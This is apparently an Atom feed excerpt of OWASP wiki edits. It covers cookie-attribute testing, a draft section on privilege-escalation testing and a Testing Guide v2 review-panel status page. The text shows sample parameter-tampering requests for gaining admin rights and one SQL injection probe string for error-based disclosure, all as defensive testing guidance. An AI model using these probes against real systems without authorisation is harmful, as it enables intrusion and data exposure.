For example if a cookie is set by an application at app.mydomain.com with no domain attribute set, then the cookie would be resubmitted for all subsequent requests for app.mydomain.com and its subdomains (such as hacker.app.mydomain.com), but not to otherapp.mydomain.com.  If a developer wanted to loosen this restriction then he could set the domain attribute to mydomain.com.  In this case the cookie would be sent to all requests for app.mydomain.com, its subdomains such as hacker.app.mydomain.com and even bank.mydomain.com.&lt;br /&gt;
If there was a vulnerable server on a subdomain such as (otherapp.mydomain.com) and the domain attribute has been set too loosely (for example mydomain.com), then the vulnerable server could be used to harvest cookies (such as session tokens).&lt;br /&gt;
 &lt;br /&gt;
*path - In addition to the domain, the URL path can be specified for which the cookie is valid.  If the domain and path match then the cookie will be sent in the request.&lt;br /&gt;
Just as with the domain attribute if the path attribute is set too loosely then it could leave the application vulnerable to attack by other applications on the same server.  For example if the path attribute was set to the web server root &amp;quot;/&amp;quot; then the application cookies will be sent to every application within the same domain. &lt;br /&gt;
&lt;br /&gt;
*expires - This attribute is used to set persistent cookies, since the cookie does not expire until the set date is exceeded.  This persistent cookie will be used by this browser session and subsequent sessions until the cookie expires.  Once the expiration date has exceeded the browser will delete the cookie.  Alternatively if this attribute is not set then the cookie is only valid in the current browser session and the cookie will be deleted when the session ends.&lt;br /&gt;
 &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Black Box testing and example ==&lt;br /&gt;
'''Testing for Topic X vulnerabilities:''' &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Using an intercepting proxy or browser plugin trap all responses where a cookie is set by the application (using the Set-cookie directive) and inspect the cookie for the following:&lt;br /&gt;
&lt;br /&gt;
*Secure Attribute - Whenever a cookie contains sensitive information or is a session token then it should always be passed using an encrypted tunnel.  For example after logging into an application and a session token is set using a cookie, then verify it is tagged using the &amp;quot;;secure&amp;quot; flag.  If it is not then the browser believes it safe to pass via an unencrypted channel such as using HTTP.&lt;br /&gt;
&lt;br /&gt;
*HttpOnly Attribute - This attribute should always be set even though not every browser supports it.  This attribute aides in securing the cookie from being accessed by a client side script so check to see if the &amp;quot;;HttpOnly&amp;quot; tag has been set.&lt;br /&gt;
&lt;br /&gt;
*Domain Attribute - Verify that the domain has not been set too loosely.  As noted above it should only be set for the server that needs to receive the cookie.  For example if the application resides on server app.mysite.com then it should be set to &amp;quot;; domain=app.mysite.com&amp;quot; and NOT &amp;quot;; domain=.mysite.com&amp;quot; as this would allow other potentially vulnerable servers to receive the cookie. &lt;br /&gt;
&lt;br /&gt;
*Path Attribute - Verify that the path attribute, just as the Domain attribute, has not been set too loosely.  Even if the Domain attribute has been configured as tight as possible, if the path is set to the root directory &amp;quot;/&amp;quot; then it can be vulnerable to less secure applications on the same server.  For example if the application resides at /myapp/ then verify that the cookies path is set to &amp;quot;; path=/myapp/&amp;quot; and NOT &amp;quot;; path=/&amp;quot; or &amp;quot;; path=/myapp&amp;quot;.  Notice here that the trailing &amp;quot;/&amp;quot; must be used after myapp.  If it is not used the browser will send the cookie to any path that matches &amp;quot;myapp&amp;quot; such as &amp;quot;myapp-exploited&amp;quot;&lt;br /&gt;
&lt;br /&gt;
*Expires Attribute - Verify that if this attribute is set to a time in the future that it does not contain any sensitive information.  For example if a cookie is set to &amp;quot;; expires=Fri, 13-Jun-2010 13:45:29 GMT&amp;quot; and it is currently June 10th 2008 then you want to inspect the cookie.  If the cookie is a session token that is stored on the user's hard drive then an attacker or local user (such as an admin) who has access to this cookie can access the application by resubmitting this token until the expiration date passes.&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
'''Whitepapers'''&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
*RFC 2965 - HTTP State Management Mechanism&lt;br /&gt;
&lt;br /&gt;
'''Tools'''&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
*Intercepting Proxy (for example OWASP's Webscarab, Burp proxy, or Paros Proxy)&lt;br /&gt;
*Browser Plug-in (for example TamperIE for Internet Explorer or Tamper Data for Firefox)&lt;/div&gt;</summary>
		<author><name>Bregolin</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Testing_for_Privilege_escalation_(OTG-AUTHZ-003)&amp;diff=33577</id>
		<title>Testing for Privilege escalation (OTG-AUTHZ-003)</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Testing_for_Privilege_escalation_(OTG-AUTHZ-003)&amp;diff=33577"/>
				<updated>2008-07-07T10:00:33Z</updated>
		
		<summary type="html">&lt;p&gt;Bregolin: Added definition of vertical, horizontal escalation. Corrected syntax where it was possible without major restructuring (however, further work is required).&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;{{Template:OWASP Testing Guide v3}}&lt;br /&gt;
&lt;br /&gt;
'''This is a draft of a section of the new Testing Guide v3'''&lt;br /&gt;
&lt;br /&gt;
== Brief Summary ==&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
This section describes the issue of escalating privileges from one stage to another. During this phase the tester should verify that it is not possible for a user to modify his privileges/roles inside the application that could allow a privilege escalation.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
== Description of the Issue == &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Privilege escalation occurs when a user gets access to more resources than he is normally allowed when it should have been protected from the application. This is usually caused by a flaw in the application. The result is that the application performs actions with more privileges than intended by the application developer or system administrator.&lt;br /&gt;
&lt;br /&gt;
The degree of the escalation depends on which privileges the attacker is authorized to possess and which privileges can be obtained in a successful attack. For example, a programming error that permits a user to gain extra privilege after successful authentication limits the degree of escalation because the user is already authorized to hold some privilege. Likewise, a remote attacker gaining superuser privilege without any authentication presents a greater degree of escalation.&lt;br /&gt;
&lt;br /&gt;
Usually we refer to ''vertical escalation'' when it is possible to access resources granted to more privileged accounts (e.g., acquiring administrative privileges for the application), and to ''horizontal escalation'' when it is possible to access resources granted to a similarly configured account (e.g., in a online banking application, accessing information related to a different user).&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
== Black Box testing and example ==&lt;br /&gt;
'''Testing for role/privilege manipulation''' &amp;lt;br&amp;gt;&lt;br /&gt;
In every point of the application where a user can create information in the DB ( a payment, add a contact, send a message), to receive information (statement of account, order details, etc.) or delete information (drop users, messages, etc.), it is necessary to record that functionality. The tester should try to access as another user to verify for example if it is possible to access a functionality that should not be permitted by the user's role.&lt;br /&gt;
&lt;br /&gt;
For example:&amp;lt;br&amp;gt;&lt;br /&gt;
The following HTTP POST permits to the user that belongs to grp001 to access order #0001:&lt;br /&gt;
&lt;br /&gt;
 POST /path/viewMyOrder.jsp HTTP/1.1&lt;br /&gt;
 Host: www.example.com&lt;br /&gt;
 [others HTTP Headers]&lt;br /&gt;
&lt;br /&gt;
 gruppoID=grp001&amp;amp;ordineID=0001&lt;br /&gt;
&lt;br /&gt;
Verify if a user that does not belong to grp001 can modify the value of the parameters ‘gruppoID’ and ‘ordineID’ to gain access to that reserved data.&lt;br /&gt;
&lt;br /&gt;
For example:&amp;lt;br&amp;gt;&lt;br /&gt;
The following server's answer shows an Hidden field in the HTML returned to the user after a successful authentication.&lt;br /&gt;
&lt;br /&gt;
 HTTP/1.1 200 OK&lt;br /&gt;
 Server: Netscape-Enterprise/6.0&lt;br /&gt;
 Date: Wed, 1 Apr 2006 13:51:20 GMT&lt;br /&gt;
 Set-Cookie: USER=aW78ryrGrTWs4MnOd32Fs51yDqp; path=/; domain=www.example.com &lt;br /&gt;
 Set-Cookie: SESSION=k+KmKeHXTgDi1J5fT7Zz; path=/; domain= www.example.com&lt;br /&gt;
 Cache-Control: no-cache&lt;br /&gt;
 Pragma: No-cache &lt;br /&gt;
 Content-length: 247&lt;br /&gt;
 Content-Type: text/html&lt;br /&gt;
 Expires: Thu, 01 Jan 1970 00:00:00 GMT&lt;br /&gt;
 Connection: close&lt;br /&gt;
 &amp;lt;form  name=“autoriz&amp;quot; method=&amp;quot;POST&amp;quot; action = “visual.jsp&amp;quot;&amp;gt; &lt;br /&gt;
 &amp;lt;input type=&amp;quot;hidden&amp;quot; name=&amp;quot;profilo&amp;quot; value=&amp;quot;SistemiInf1&amp;quot;&amp;gt;                                         &lt;br /&gt;
 &amp;lt;body onload=&amp;quot;document.forms.autoriz.submit()&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;/td&amp;gt;&lt;br /&gt;
 &amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
What if the tester modifies the value of the variable &amp;quot;profilo&amp;quot; with “SistemiInf9”? &lt;br /&gt;
It is possible to become administrator?&lt;br /&gt;
&lt;br /&gt;
For example:&amp;lt;br&amp;gt;&lt;br /&gt;
In an environment in which the server sends an error message contained as value in a specific parameter in a set of answer's codes, as the following:&lt;br /&gt;
&lt;br /&gt;
 @0`1`3`3``0`UC`1`Status`OK`SEC`5`1`0`ResultSet`0`PVValido`-1`0`0` Notifications`0`0`3`Command  Manager`0`0`0` StateToolsBar`0`0`0`    &lt;br /&gt;
 StateExecToolBar`0`0`0`FlagsToolBar`0&lt;br /&gt;
&lt;br /&gt;
The server gives an implicit trust to the user. It believes that the user will answer with the above message closing the session.&lt;br /&gt;
In this condition, verify that modifying the parameters value it is not possible to escalate privileges.&lt;br /&gt;
For example modifying the `PVValido` value from '-1' to '0' (no error conditions) it is possible to authenticate as administrator to the server.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
'''Result Expected:'''&amp;lt;br&amp;gt;&lt;br /&gt;
The tester should verify to execute a successful privilege escalation&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Gray Box testing and example == &lt;br /&gt;
'''Testing for Topic X vulnerabilities:'''&amp;lt;br&amp;gt;&lt;br /&gt;
...&amp;lt;br&amp;gt;&lt;br /&gt;
'''Result Expected:'''&amp;lt;br&amp;gt;&lt;br /&gt;
...&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
== References ==&lt;br /&gt;
'''Whitepapers'''&amp;lt;br&amp;gt;&lt;br /&gt;
...&amp;lt;br&amp;gt;&lt;br /&gt;
'''Tools'''&amp;lt;br&amp;gt;&lt;br /&gt;
* OWASP WebScarab&lt;br /&gt;
...&amp;lt;br&amp;gt;&lt;/div&gt;</summary>
		<author><name>Bregolin</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=OWASP_Testing_Guide_v2_Review_Panel&amp;diff=13152</id>
		<title>OWASP Testing Guide v2 Review Panel</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=OWASP_Testing_Guide_v2_Review_Panel&amp;diff=13152"/>
				<updated>2006-11-16T17:02:54Z</updated>
		
		<summary type="html">&lt;p&gt;Bregolin: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[http://www.owasp.org/index.php/OWASP_Testing_Guide_v2_Table_of_Contents Table of Contents]]&lt;br /&gt;
&lt;br /&gt;
Update: 15th November, 16.00 (GMT+1)&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&lt;br /&gt;
**********************&lt;br /&gt;
&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;Reviewing planning&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&lt;br /&gt;
**********************&lt;br /&gt;
&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The reviewers are:&lt;br /&gt;
Mark Roxberry,&lt;br /&gt;
Alberto Revelli,&lt;br /&gt;
Daniel Cuthbert,&lt;br /&gt;
Antonio Parata,&lt;br /&gt;
Matteo G.P. Flora,&lt;br /&gt;
Matteo Meucci,&lt;br /&gt;
Eoin Keary,&lt;br /&gt;
Stefano Di Paola,&lt;br /&gt;
James Kist,&lt;br /&gt;
Vicente Aguilera,&lt;br /&gt;
Mauro Bregolin,&lt;br /&gt;
Syed Mohamed A&lt;br /&gt;
&lt;br /&gt;
We can begin the 1st reviewing phase by review all 63 articles (nearly 13 articles per person). The deadline is 15th November at 20.00 (GMT+1) because we have 15th November as 1st deadline for the Autumn of Code Project.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&lt;br /&gt;
*********************************************&lt;br /&gt;
&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;We are waiting for the following articles &amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&lt;br /&gt;
*********************************************&lt;br /&gt;
&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
4.2.2 Spidering and googling (40%, Tom Brennan, Tom Ryan) &amp;lt;br&amp;gt;&lt;br /&gt;
4.2.4.2 DB Listener Testing TD (Maybe Eoin?)&amp;lt;br&amp;gt;&lt;br /&gt;
4.5.5 HTTP Exploit (0%, Arian J.Evans)&amp;lt;br&amp;gt;&lt;br /&gt;
4.6.2.2 Oracle testing TD &amp;lt;br&amp;gt;&lt;br /&gt;
4.6.4 ORM Injection (0%, Mark Roxberry)&amp;lt;br&amp;gt;&lt;br /&gt;
5. Writing Reports: value the real risk&amp;lt;br&amp;gt;&lt;br /&gt;
5.1 How to value the real risk (50%, Daniel Cuthbert, Matteo Meucci, Sebastien Deleersnyder, Marco Morana)&amp;lt;br&amp;gt;&lt;br /&gt;
5.2 How to write the report of the testing (0%, Daniel Cuthbert, Tom Brennan, Tom Ryan) &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&lt;br /&gt;
*********************************************************&lt;br /&gt;
&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;Here is the complete list of articles to be reviewed: &amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&lt;br /&gt;
*********************************************************&lt;br /&gt;
&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
_________________________________________________________________________________________________________________________&lt;br /&gt;
* '''Introduction --&amp;gt; reviewed by Eoin Keary'''&lt;br /&gt;
'''[OK]'''&lt;br /&gt;
&lt;br /&gt;
_________________________________________________________________________________________________________________________&lt;br /&gt;
* '''The OWASP Testing Framework --&amp;gt;...'''&lt;br /&gt;
1 of 1 article to be reviewed &lt;br /&gt;
&lt;br /&gt;
_________________________________________________________________________________________________________________________&lt;br /&gt;
* '''4.1 Introduction and objectives --&amp;gt;.EK'''&lt;br /&gt;
'''[OK]'''&lt;br /&gt;
&lt;br /&gt;
_________________________________________________________________________________________________________________________&lt;br /&gt;
* '''4.2 Information Gathering (Reviewed by EK) --&amp;gt; Keary'''&lt;br /&gt;
9 of 10 articles reviewed -&amp;gt; &amp;lt;BR&amp;gt; &lt;br /&gt;
* '''Application Discovery''': &lt;br /&gt;
** Reviewed + updated(EK) (Maybe we should include HTTP methods for application descovery, such as HTTP HEAD command?)&amp;lt;BR&amp;gt;&lt;br /&gt;
** (Bregolin) If you are referring to things such as &amp;quot;fingerprinting&amp;quot;, it was hinted - and I personally agree on this - to create a new section on Web application fingerprinting. There's however a bit of overlap with Infrastructure configuration management testing&lt;br /&gt;
* '''Analysis of error codes''': &lt;br /&gt;
** Reviewed + updated(EK) &amp;lt;BR&amp;gt;&lt;br /&gt;
** Besides the own error, it would be necessary to speak about the voluntary provocation of errors? (Vicente). Two examples: &amp;lt;BR&amp;gt;&lt;br /&gt;
*** Example 1: Type error. (original): ?id=276 (test): ?id=X &amp;lt;BR&amp;gt;&lt;br /&gt;
*** Example 2: Type conversion error. (original): ?id=276 (test): ?id=276 and 1 in (select top 1 name from sysobjects) &amp;lt;BR&amp;gt;&lt;br /&gt;
** (Bregolin) Agree with the above. A testing methodology should be formalized, i.e. tester should verify if it is possible to cause information disclosure in error or diagnostic messages by tampering with user-alterable input using a set of techniques (such as type mismatch, overflow/underflow, excess input length, various forms of injection, ...)&lt;br /&gt;
* '''Infrastructure configuration management testing AoC''': &lt;br /&gt;
** Reviewed by EK. '''Not in typical guide structure'''&amp;lt;BR&amp;gt;&lt;br /&gt;
* '''SSL/TLS Testing AoC''': &lt;br /&gt;
** Reviewed + updated(EK) &amp;lt;BR&amp;gt;&lt;br /&gt;
* '''DB Listener Testing''': &lt;br /&gt;
** '''Incomplete'''&amp;lt;BR&amp;gt;&lt;br /&gt;
* '''Application configuration management testing''': &lt;br /&gt;
** Reviewed by EK. '''Not typical guide structure'''&lt;br /&gt;
** This is generally a &amp;quot;white box&amp;quot; section. There are no examples of testing the configuration from a remote perspective. If this was the aim of the document, thats fine. '''- Need feedback on this one!!'''&lt;br /&gt;
** ''Sample/known files and directories'': might be good to refer to http://www.owasp.org/index.php/Old_file_testing_AoC ??&lt;br /&gt;
** ''Logging'': Timestamp is also important&lt;br /&gt;
* '''File extensions handling'''&amp;lt;BR&amp;gt;&lt;br /&gt;
** contains the text: &amp;quot;''...To review and expand...''&amp;quot; - '''Is this complete??'''&lt;br /&gt;
** '''Need a second opinion on this one'''!! :)&lt;br /&gt;
* '''Old file testing''': Reviewed by EK&lt;br /&gt;
&amp;lt;BR&amp;gt;&lt;br /&gt;
&lt;br /&gt;
_________________________________________________________________________________________________________________________&lt;br /&gt;
* '''4.3 Business logic testing --&amp;gt; Meucci'''&lt;br /&gt;
1 of 1 article reviewed &lt;br /&gt;
'''[OK]'''&lt;br /&gt;
&lt;br /&gt;
_________________________________________________________________________________________________________________________&lt;br /&gt;
* '''4.4 Authentication Testing --&amp;gt; Roxberry (articles have been edited)'''&lt;br /&gt;
0 of 7 articles to be reviewed &lt;br /&gt;
'''[OK]'''&lt;br /&gt;
** 4.4 Authentication Testing (95%) : Reviewed by MR [http://www.markroxberry.net/archive/2006/11/14/Authentication-Testing-Index-Page.aspx Authentication Testing Index]&lt;br /&gt;
** 4.4.1 Default or guessable (dictionary) user account (80%) : Reviewed by MR [http://www.markroxberry.net/archive/2006/11/14/Default-or-Guessable-User-Account-Testing-AoC.aspx Default or guessable user account review]&lt;br /&gt;
** 4.4.2 Brute Force (95%) : Reviewed by MR [http://www.markroxberry.net/archive/2006/11/14/Brute-Force-Testing-AoC.aspx Brute Force review]&lt;br /&gt;
** 4.4.3 Bypassing authentication schema (95%) : Reviewed by MR [http://www.markroxberry.net/archive/2006/11/14/Bypassing-Authentication-Schema-AoC.aspx Bypass Authentication review]&lt;br /&gt;
** 4.4.4 Directory traversal/file include (100%) : Reviewed by MR [http://www.markroxberry.net/archive/2006/11/14/Directory-Traversal-Testing-AOC.aspx Directory Traversal Testing review]&lt;br /&gt;
** 4.4.5 Vulnerable remember password and pwd reset (90%) Reviewed by MR [http://www.markroxberry.net/archive/2006/11/14/Vulnerable-Remember-Password-and-Pwd-Reset-AoC.aspx Vulnerable Reset Password review]&lt;br /&gt;
** 4.4.6 Logout and Browser Cache Management Testing (100%) Reviewed by MR [http://www.markroxberry.net/archive/2006/11/14/Logout-and-Browser-Cache-Management-Testing-AoC.aspx Logout and Browser Cache Management Testing review]&lt;br /&gt;
&lt;br /&gt;
_________________________________________________________________________________________________________________________&lt;br /&gt;
* '''4.5 Session Management Testing --&amp;gt; Syed Mohamed A'''&lt;br /&gt;
5 of 6 articles to be reviewed  &lt;br /&gt;
** 4.5 Session Management Testing (95%)&lt;br /&gt;
** 4.5.1 Analysis of the Session Management Schema (90%)&lt;br /&gt;
** 4.5.2 Cookie and Session token Manipulation (100%)&lt;br /&gt;
** 4.5.3 Exposed session variables (90%)&lt;br /&gt;
** 4.5.4 Session Riding (XSRF) (80%)&lt;br /&gt;
** 4.5.5 HTTP Exploit (0%)&lt;br /&gt;
&lt;br /&gt;
_________________________________________________________________________________________________________________________&lt;br /&gt;
* '''4.6 Data Validation Testing --&amp;gt; Meucci'''&lt;br /&gt;
18 articles reviewed (3 are at 0%)&lt;br /&gt;
'''[OK]'''&lt;br /&gt;
** 4.6 Data Validation Testing : Reviewed by EK&lt;br /&gt;
*** (Bregolin) begin&lt;br /&gt;
*** [Note: Haven't committed the following since that would imply a substantial rewrite, let's see what others think]&lt;br /&gt;
*** I think that this section should first categorize what constitutes input for a web application. (Which allows to identify what must be tested, and how). i.e., obviously input fields, hidden fields, HTTP headers (such as Referer, cookies), HTTP methods etc.&lt;br /&gt;
*** There are other kinds of injection, such as CRLF injection.&lt;br /&gt;
*** SQL Injection affects SQL statements, and not queries (though usually that's the case)&lt;br /&gt;
*** It should be stressed that the main reason to perform data validation is to prevent application faults, i.e. unexpected behavior, that is violation of (security) requirements. Regardless of the categories of vulnerabilities listed, an application should (actually must!) verify all input against: type, length, range or domain validity. &amp;quot;Bad&amp;quot; input may not cause any of the listed vulnerabilities yet cause the application to misbehave, if it is not checked (possibly causing DoS or violating data integrity or confidentiality).&lt;br /&gt;
*** (Bregolin) end&lt;br /&gt;
** 4.6.1 Cross site scripting: Reviewed by EK (Reformatted it slightly with wiki tags). '''Not completed'''&lt;br /&gt;
** 4.6.1.1 HTTP Methods and XST Reviewed by MM. Reviewed by AP.&lt;br /&gt;
** 4.6.2 SQL Injection (90%) Reviewed by MM. Reviewed by EK.&lt;br /&gt;
*** Not sure about &amp;quot;inferential&amp;quot; injection definition in &amp;quot;Description of Issue&amp;quot;&lt;br /&gt;
*** Added some reference to Oracle. Corrected English.&lt;br /&gt;
** 4.6.2.1 Stored procedure injection (40%) '''TD (not enough informations)'''&lt;br /&gt;
**4.6.2.2 Oracle testing (0%) '''TD (not enough informations)'''&lt;br /&gt;
** 4.6.2.3 MySQL testing (100%) Reviewed by MM&lt;br /&gt;
** 4.6.2.4 SQL Server testing (95%) Reviewed by MM. '''tools?'''&lt;br /&gt;
** 4.6.3 LDAP Injection (90%) Reviewed by MM added wp and tools&lt;br /&gt;
** 4.6.4 ORM Injection (0%) '''TD (not enough informations)'''&lt;br /&gt;
** 4.6.5 XML Injection (90%) Reviwed and updated by MM. '''WP and tools?'''&lt;br /&gt;
** 4.6.6 SSI Injection (95%) Reviewed by MM &lt;br /&gt;
** 4.6.7 XPath Injection (80%) Reviewed by MM. '''Gray box section is to complete?'''&lt;br /&gt;
** 4.6.8 IMAP/SMTP Injection (95%)Reviewed by MM &lt;br /&gt;
** 4.6.9 Code Injection (70%) Reviewed by MM. '''Not completed'''&lt;br /&gt;
** 4.6.10 OS Commanding (70%) Reviewed by MM. '''Not completed'''&lt;br /&gt;
** 4.6.11 Buffer overflow Testing (100%) Reviewed by MM. '''Note: these tests are not usual web app tests'''&lt;br /&gt;
*** (Bregolin) The point is that these are not black box tests, so where they are now they are misplaced&lt;br /&gt;
** 4.6.11.1 Heap overflow (100%) Reviewed by MM&lt;br /&gt;
** 4.6.11.2 Stack overflow (100%)Reviewed by MM&lt;br /&gt;
** 4.6.11.3 Format string (100%)Reviewed by MM&lt;br /&gt;
** 4.6.12 Incubated vulnerability testing (95%) Reviewed by MM, whitepapers?&lt;br /&gt;
&lt;br /&gt;
_________________________________________________________________________________________________________________________&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* '''4.7 Denial of Service Testing--&amp;gt; Revelli'''&lt;br /&gt;
8 of 8 articles Reviewed&lt;br /&gt;
'''[OK] - To do the References'''&lt;br /&gt;
** 4.7 Denial of Service Testing 100% Reviewed by Revelli&lt;br /&gt;
** 4.7.1 Locking Customer Accounts 100% Reviewd by Revelli&lt;br /&gt;
** 4.7.2 Buffer Overflows 100% Reviewd by Revelli&lt;br /&gt;
** 4.7.3 User Specified Object Allocation 100% Reviewd by Revelli&lt;br /&gt;
** 4.7.4 User Input as a Loop Counter 100% Reviewd by Revelli&lt;br /&gt;
** 4.7.5 Writing User Provided Data to Disk 100% Reviewd by Revelli&lt;br /&gt;
** 4.7.6 Failure to Release Resources 100% Reviewd by Revelli&lt;br /&gt;
** 4.7.7 Storing too Much Data in Session 100% Reviewd by Revelli&lt;br /&gt;
&lt;br /&gt;
_________________________________________________________________________________________________________________________&lt;br /&gt;
* '''4.8 Web Services Testing --&amp;gt; Matteo Meucci'''&lt;br /&gt;
6 of 6 articles reviewed&lt;br /&gt;
'''[OK]'''&lt;br /&gt;
** 4.8 Web Services Testing (100%) Reviewed by Meucci&lt;br /&gt;
** 4.8.1 XML Structural Testing (100%) Reviewed by Meucci&lt;br /&gt;
** 4.8.2 XML content-level Testing (90%) Reviewed by Meucci&lt;br /&gt;
** 4.8.3 HTTP GET parameters/REST Testing (100%) Reviewed by Meucci&lt;br /&gt;
** 4.8.4 Naughty SOAP attachments (95%) Reviewed by Meucci&lt;br /&gt;
** 4.8.5 Replay Testing (95%) Reviewed by Meucci. '''Need to add code examples, images and proof of impersonation'''&lt;br /&gt;
&lt;br /&gt;
_________________________________________________________________________________________________________________________&lt;br /&gt;
* '''4.9 AJAX Testing --&amp;gt; Roxberry'''&lt;br /&gt;
3 of 3 articles to be reviewed &lt;br /&gt;
** 4.9 AJAX Testing (70%)&lt;br /&gt;
** 4.9.1 Vulnerabilities (60%)&lt;br /&gt;
** 4.9.2 How to test (60%)&lt;br /&gt;
&lt;br /&gt;
_________________________________________________________________________________________________________________________&lt;br /&gt;
* '''5. Writing Reports: value the real risk'''&lt;br /&gt;
We have to write about it. I consider it not yet finished.&lt;br /&gt;
O of 3 articles to be reviewed.&lt;br /&gt;
&lt;br /&gt;
_________________________________________________________________________________________________________________________&lt;br /&gt;
* '''Appendix A: Testing Tools --&amp;gt;...'''&lt;br /&gt;
1 article of 1: need to update it searching all the guide for paragraps: tools&lt;br /&gt;
&lt;br /&gt;
_________________________________________________________________________________________________________________________&lt;br /&gt;
* '''Appendix B: Suggested Reading --&amp;gt;...'''&lt;br /&gt;
1 article of 1: need to update it searching all the guide for paragraps: tools&lt;br /&gt;
&lt;br /&gt;
_________________________________________________________________________________________________________________________&lt;br /&gt;
* '''Appendix C: Fuzz Vectors --&amp;gt; Stefano Di Paola'''&lt;br /&gt;
1 article of 1: Need to be updated&lt;br /&gt;
&lt;br /&gt;
_________________________________________________________________________________________________________________________&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&lt;br /&gt;
*************************&lt;br /&gt;
&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
Reviewers  Rules &amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&lt;br /&gt;
*************************&lt;br /&gt;
&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
1) Check the english language&amp;lt;br&amp;gt;&lt;br /&gt;
2) Check the template: the articles on chapter 4 should have the following:&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Template (http://www.owasp.org/index.php/Template_Paragraph_Testing_AoC)&lt;br /&gt;
&lt;br /&gt;
In some articles we don't need to talk about Gray Box Testing or other, so we can eliminate it.&lt;br /&gt;
&lt;br /&gt;
3) Check the reference style. (I'd like to have all the referenced URLs visible because I have to produce also a pdf document of the Guide).&lt;br /&gt;
I agree with Stefano, we have to use a reference like that:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;== References ==&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;'''Whitepapers'''&amp;lt;br&amp;gt;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;* [1] Author1, Author2: &amp;quot;Title&amp;quot; - http://www.ietf.org/rfc/rfc2254.txt&amp;lt;br&amp;gt;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;* [2]...&amp;lt;br&amp;gt;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;'''Tools'''&amp;lt;br&amp;gt;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;* Francois Larouche: &amp;quot;Multiple DBMS Sql Injection tool&amp;quot; - http://www.sqlpowerinjector.com/index.htm &amp;lt;br&amp;gt;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
4) Check the reference with the other articles of the guide or with the other OWASP Project.&lt;br /&gt;
&lt;br /&gt;
5) Other?&lt;/div&gt;</summary>
		<author><name>Bregolin</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=OWASP_Testing_Guide_v2_Review_Panel&amp;diff=13151</id>
		<title>OWASP Testing Guide v2 Review Panel</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=OWASP_Testing_Guide_v2_Review_Panel&amp;diff=13151"/>
				<updated>2006-11-16T16:29:07Z</updated>
		
		<summary type="html">&lt;p&gt;Bregolin: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[http://www.owasp.org/index.php/OWASP_Testing_Guide_v2_Table_of_Contents Table of Contents]]&lt;br /&gt;
&lt;br /&gt;
Update: 15th November, 16.00 (GMT+1)&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&lt;br /&gt;
**********************&lt;br /&gt;
&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;Reviewing planning&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&lt;br /&gt;
**********************&lt;br /&gt;
&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The reviewers are:&lt;br /&gt;
Mark Roxberry,&lt;br /&gt;
Alberto Revelli,&lt;br /&gt;
Daniel Cuthbert,&lt;br /&gt;
Antonio Parata,&lt;br /&gt;
